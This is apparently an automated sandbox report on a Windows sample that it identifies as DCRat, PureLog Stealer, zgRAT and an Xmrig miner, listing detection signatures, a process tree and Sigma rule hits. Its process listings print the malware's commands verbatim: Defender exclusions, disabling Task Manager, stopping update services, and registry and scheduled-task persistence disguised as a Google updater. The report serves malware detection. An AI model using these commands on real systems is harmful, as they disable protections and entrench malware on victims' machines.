Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
AstralprivateDLL.exe.bin.exe

Overview

General Information

Sample name:AstralprivateDLL.exe.bin.exe
Analysis ID:1590023
MD5:c9f4668c97eb480751e1bbf6173fc4e1
SHA1:528deade2bc88cafc26f78f7c73490b66abdf370
SHA256:b9f8572fc7a8a6c2230434abb7190ae860f28386b3f0d5e5ee3754c6befca240
Tags:DCRatexeNyashTeamuser-MalHunter3
Infos:

Detection

DCRat, PureLog Stealer, Xmrig, zgRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Schedule system process
Sigma detected: Stop multiple services
Suricata IDS alerts for network traffic
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected Xmrig cryptocurrency miner
Yara detected zgRAT
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
Connects to a pastebin service (likely for C&C)
Contains functionality to compare user and computer (likely to detect sandboxes)
Contains functionality to inject code into remote processes
Creates a thread in another existing process (thread injection)
Creates an autostart registry key pointing to binary in C:\Windows
Creates an undocumented autostart registry key
Creates autostart registry keys with suspicious values (likely registry only malware)
Creates multiple autostart registry keys
Creates processes via WMI
Disable Task Manager(disabletaskmgr)
Disables the Windows task manager (taskmgr)
Drops PE files with benign system names
Found direct / indirect Syscall (likely to bypass EDR)
Found hidden mapped module (file has been removed from disk)
Hooks files or directories query functions (used to hide files and directories)
Hooks processes query functions (used to hide processes)
Hooks registry keys query functions (used to hide registry keys)
Infects executable files (exe, dll, sys, html)
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Installs new ROOT certificates
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies power options to not sleep / hibernate
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Sample uses string decryption to hide its real strings
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Stops critical windows services
Suspicious powershell command line found
Uses Register-ScheduledTask to add task schedules
Uses powercfg.exe to modify the power settings
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Compiles C# or VB.Net code
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Entry point lies outside standard sections
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found evasive API chain (may stop execution after accessing registry keys)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: CurrentVersion NT Autorun Keys Modification
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Powershell In Registry Run Keys
Sigma detected: Uncommon Svchost Parent Process
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores large binary data to the registry
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • AstralprivateDLL.exe.bin.exe (PID: 7116 cmdline: "C:\Users\user\Desktop\AstralprivateDLL.exe.bin.exe" MD5: C9F4668C97EB480751E1BBF6173FC4E1)
    • Astral private DLL.exe (PID: 5040 cmdline: "C:\Users\user\AppData\Local\Temp\Astral private DLL.exe" MD5: C28FADCE847B20E2442ABA2F2F9F5699)
      • wscript.exe (PID: 5216 cmdline: "C:\Windows\System32\WScript.exe" "C:\containerperf\mtmIdTw4RygS3trJMnWvLFqF6dzRpLwhZvwqEPqaKDGsnR5lufKuCs3iyL.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
        • cmd.exe (PID: 6472 cmdline: C:\Windows\system32\cmd.exe /c ""C:\containerperf\OHYKCXOXzFm1PCyBPS6uXfmto4OWxv9XE4FGIVj.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 6168 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • reg.exe (PID: 4960 cmdline: reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
          • ServerComponenthostMonitorDll.exe (PID: 6808 cmdline: "C:\containerperf/ServerComponenthostMonitorDll.exe" MD5: 01287AA2A0B5D2178CB13C477A04DC21)
            • csc.exe (PID: 2424 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\toes5wxx\toes5wxx.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
              • conhost.exe (PID: 1220 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • cvtres.exe (PID: 4488 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF04D.tmp" "c:\Windows\System32\CSCC4EE3A879404710AD2E4883A563BED.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
    • twain_32.exe (PID: 4948 cmdline: "C:\Users\user\AppData\Local\Temp\twain_32.exe" MD5: 1FF26B7D334CD22E726CAF72A4208B96)
      • dialer.exe (PID: 1456 cmdline: C:\Windows\System32\dialer.exe MD5: B2626BDCF079C6516FC016AC5646DF93)
        • winlogon.exe (PID: 552 cmdline: winlogon.exe MD5: F8B41A1B3E569E7E6F990567F21DCE97)
        • lsass.exe (PID: 628 cmdline: C:\Windows\system32\lsass.exe MD5: A1CC00332BBF370654EE3DC8CDC8C95A)
          • MpCmdRun.exe (PID: 1720 cmdline: "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable MD5: B3676839B2EE96983F9ED735CD044159)
            • conhost.exe (PID: 3720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • schtasks.exe (PID: 1720 cmdline: schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 9 /tr "'C:\containerperf\lsass.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
        • svchost.exe (PID: 920 cmdline: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • dwm.exe (PID: 988 cmdline: "dwm.exe" MD5: 5C27608411832C5B39BA04E33D53536C)
        • svchost.exe (PID: 364 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • svchost.exe (PID: 356 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • svchost.exe (PID: 696 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • svchost.exe (PID: 592 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • svchost.exe (PID: 1044 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • Conhost.exe (PID: 9200 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • Conhost.exe (PID: 9548 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • Conhost.exe (PID: 9336 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • Conhost.exe (PID: 8604 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • powershell.exe (PID: 5800 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 3492 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 648 cmdline: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 4476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 4924 cmdline: sc stop UsoSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
    • sc.exe (PID: 1016 cmdline: sc stop WaaSMedicSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
    • sc.exe (PID: 2516 cmdline: sc stop wuauserv MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
    • sc.exe (PID: 6520 cmdline: sc stop bits MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
    • sc.exe (PID: 3272 cmdline: sc stop dosvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
  • cmd.exe (PID: 4108 cmdline: C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 6420 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 3492 cmdline: powercfg /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
    • powercfg.exe (PID: 1016 cmdline: powercfg /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
    • powercfg.exe (PID: 5812 cmdline: powercfg /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
    • powercfg.exe (PID: 6064 cmdline: powercfg /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
  • powershell.exe (PID: 1460 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#amvyyojjq#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 1608 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
DCRatDCRat is a typical RAT that has been around since at least June 2019.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat
NameDescriptionAttributionBlogpost URLsLink
xmrigAccording to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig
NameDescriptionAttributionBlogpost URLsLink
zgRATzgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat
No configs have been found
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
    SourceRuleDescriptionAuthorStrings
    C:\Windows\en-GB\WmiPrvSE.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
      C:\Windows\en-GB\WmiPrvSE.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
        C:\containerperf\ServerComponenthostMonitorDll.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
          C:\containerperf\ServerComponenthostMonitorDll.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
            C:\Program Files\Windows Defender\Platform\sihost.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
              Click to see the 9 entries
              SourceRuleDescriptionAuthorStrings
              00000000.00000003.1717902037.0000000003033000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                0000000D.00000000.1791002299.0000000000222000.00000002.00000001.01000000.0000000B.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                  00000001.00000003.1728765563.0000000006653000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                    00000001.00000003.1729671319.000000000665D000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                      0000000D.00000002.2245855345.00000000126BD000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                        SourceRuleDescriptionAuthorStrings
                        1.3.Astral private DLL.exe.66ab718.1.raw.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                          1.3.Astral private DLL.exe.66ab718.1.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                            0.3.AstralprivateDLL.exe.bin.exe.308171f.0.raw.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                              0.3.AstralprivateDLL.exe.bin.exe.308171f.0.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                                13.0.ServerComponenthostMonitorDll.exe.220000.0.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                                  Click to see the 9 entries

                                  Operating System Destruction

                                  barindex
                                  Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc, CommandLine: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc, ProcessId: 648, ProcessName: cmd.exe

                                  System Summary

                                  barindex
                                  Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\containerperf\ServerComponenthostMonitorDll.exe, ProcessId: 6808, TargetFilename: C:\Windows\en-GB\WmiPrvSE.exe
                                  Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#amvyyojjq#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#amvyyojjq#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }, CommandLine|base64offset|contains: [, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#amvyyojjq#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }, ProcessId: 1460, ProcessName: powershell.exe
                                  Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#amvyyojjq#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#amvyyojjq#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }, CommandLine|base64offset|contains: [, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#amvyyojjq#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }, ProcessId: 1460, ProcessName: powershell.exe
                                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, ProcessId: 5800, ProcessName: powershell.exe
                                  Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Windows\appcompat\powershell.exe", EventID: 13, EventType: SetValue, Image: C:\containerperf\ServerComponenthostMonitorDll.exe, ProcessId: 6808, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\powershell
                                  Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: explorer.exe, "C:\Windows\appcompat\powershell.exe", EventID: 13, EventType: SetValue, Image: C:\containerperf\ServerComponenthostMonitorDll.exe, ProcessId: 6808, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell
                                  Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\toes5wxx\toes5wxx.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\toes5wxx\toes5wxx.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\containerperf/ServerComponenthostMonitorDll.exe", ParentImage: C:\containerperf\ServerComponenthostMonitorDll.exe, ParentProcessId: 6808, ParentProcessName: ServerComponenthostMonitorDll.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\toes5wxx\toes5wxx.cmdline", ProcessId: 2424, ProcessName: csc.exe
                                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, ProcessId: 5800, ProcessName: powershell.exe
                                  Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\AstralprivateDLL.exe.bin.exe, ProcessId: 7116, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
                                  Source: Registry Key setAuthor: frack113, Florian Roth (Nextron Systems): Data: Details: "C:\Windows\appcompat\powershell.exe", EventID: 13, EventType: SetValue, Image: C:\containerperf\ServerComponenthostMonitorDll.exe, ProcessId: 6808, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\powershell
                                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: C:\Windows\System32\dialer.exe, ParentImage: C:\Windows\System32\dialer.exe, ParentProcessId: 1456, ParentProcessName: dialer.exe, ProcessCommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, ProcessId: 920, ProcessName: svchost.exe
                                  Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\containerperf\mtmIdTw4RygS3trJMnWvLFqF6dzRpLwhZvwqEPqaKDGsnR5lufKuCs3iyL.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\containerperf\mtmIdTw4RygS3trJMnWvLFqF6dzRpLwhZvwqEPqaKDGsnR5lufKuCs3iyL.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Astral private DLL.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Astral private DLL.exe, ParentProcessId: 5040, ParentProcessName: Astral private DLL.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\containerperf\mtmIdTw4RygS3trJMnWvLFqF6dzRpLwhZvwqEPqaKDGsnR5lufKuCs3iyL.vbe" , ProcessId: 5216, ProcessName: wscript.exe
                                  Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\containerperf\ServerComponenthostMonitorDll.exe, ProcessId: 6808, TargetFilename: C:\Users\user\AppData\Local\Temp\toes5wxx\toes5wxx.cmdline
